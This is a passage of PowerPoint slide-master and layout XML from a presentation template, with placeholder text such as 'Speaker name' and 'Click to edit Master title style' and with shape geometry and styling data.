          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1174">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1750B2-C378-4896-80E6-341FDC8E0FED}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-IN" sz="1174" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semi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174"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4" name="Title 3"/>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99814730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Commercial Sales Solution Tours">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B44543-7EC3-4D92-A3C0-0F951DCF6FFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6096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solidFill>
                  <a:schemeClr val="bg2"/>
                </a:soli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5491737" cy="1792326"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="164592" tIns="109728" rIns="164592" bIns="109728">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3137" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Speaker name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing clipart&#10;&#10;Description generated with very high confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C3B17B8-7C52-498A-A111-6BFC2163F7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79425"/>
            <a:ext cx="1413101" cy="301697"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2307028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28077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069771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02603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21719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2548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itle &amp; Non-bulleted text">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A8FD8D-D212-4020-842E-55BE222CD0D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="12192000" cy="10541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0" y="124411"/>
            <a:ext cx="11655840" cy="899665"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269239" y="1379677"/>
            <a:ext cx="11653523" cy="1985641"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1961">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="224097" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="448193" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="672290" indent="0">
              <a:buNone/>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04216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4064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263098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909873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26135407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015663"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="600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35792305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1180969709"/>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1133577063"/>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51038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94385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2067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text box">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A8FD8D-D212-4020-842E-55BE222CD0D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="12192000" cy="10541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0" y="124411"/>
            <a:ext cx="11655840" cy="899665"/>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63922496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164951017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6515668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ontent Slide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3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263524" y="1420824"/>
            <a:ext cx="11660789" cy="4852747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C0000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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1177" y="6603024"/>
            <a:ext cx="12192313" cy="265884"/>
            <a:chOff x="-1200" y="6644680"/>
            <a:chExt cx="12436794" cy="360970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 17"/>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9" name="TextBox 18"/>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244530414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63949" y="289511"/>
            <a:ext cx="11655078" cy="1051560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lorem ipsum dolor sit.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1177" y="6603024"/>
            <a:ext cx="12192313" cy="265884"/>
            <a:chOff x="-1200" y="6644680"/>
            <a:chExt cx="12436794" cy="360970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>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3" name="TextBox 12"/>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1387934690"/>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917">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="523">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="29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Image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7" name="Picture Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264570" y="1420824"/>
            <a:ext cx="7151167" cy="4852747"/>
          </a:xfrm>
          <a:ln w="152400">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Screen shot or image here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7415737" y="1420824"/>
            <a:ext cx="4508581" cy="4852747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3137">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="336145" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="560241" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="784338" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1008435" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>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p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1177" y="6603024"/>
            <a:ext cx="12192313" cy="265884"/>
            <a:chOff x="-1200" y="6644680"/>
            <a:chExt cx="12436794" cy="360970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22"/>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24" name="TextBox 23"/>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403236882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Diagram layout">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Freeform: Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="1428466"/>
            <a:ext cx="12191999" cy="5429535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX1" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX2" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY2" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX3" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY3" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX4" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY4" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX5" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY5" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX6" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY6" fmla="*/ 5316786 h 5316786"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY7" fmla="*/ 5316786 h 5316786"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX1" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX2" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY2" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX3" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY3" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX4" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY4" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX5" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY5" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY6" fmla="*/ 5316786 h 5316786"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX1" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX2" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY2" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX3" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY3" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX4" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY4" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY5" fmla="*/ 5316786 h 5316786"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 531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5316786">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12191999" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12191999" y="119540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7315199" y="119540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7315199" y="5315056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5316786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5F2FC"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="896386">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1765" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7692554" y="1889196"/>
            <a:ext cx="3977545" cy="4576917"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx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24464" y="358848"/>
            <a:ext cx="11384209" cy="892552"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="110400"/>
            <a:ext cx="3048001" cy="355158"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3472043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53523" cy="2162131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="392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614762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p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 17"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3090210" y="126993"/>
            <a:ext cx="9043734" cy="6634630"/>
            <a:chOff x="1951" y="0"/>
            <a:chExt cx="5890" cy="4321"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="Group 218"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1951" y="2190"/>
              <a:ext cx="5871" cy="2131"/>
              <a:chOff x="1951" y="2190"/>
              <a:chExt cx="5871" cy="2131"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1561" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1951"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19"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2149"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20"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2299"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Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2446"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Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2643"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Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2792"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24"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2990" y="219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25"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140"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26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3288"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Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="343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28"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3632"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29"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="382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30"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4228"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Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4425"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32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4575"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Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723"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Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4920"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Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5070"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Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="521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Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5414"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Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="560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Freeform 39"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5806"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Freeform 40"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5943" y="2202"/>
                <a:ext cx="188" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 185 w 188"/>
                  <a:gd name="T3" fmla="*/ 86 h 220"/>
                  <a:gd name="T4" fmla="*/ 141 w 188"/>
                  <a:gd name="T5" fmla="*/ 86 h 220"/>
                  <a:gd name="T6" fmla="*/ 130 w 188"/>
                  <a:gd name="T7" fmla="*/ 136 h 220"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 136 h 220"/>
                  <a:gd name="T10" fmla="*/ 173 w 188"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 126 w 188"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
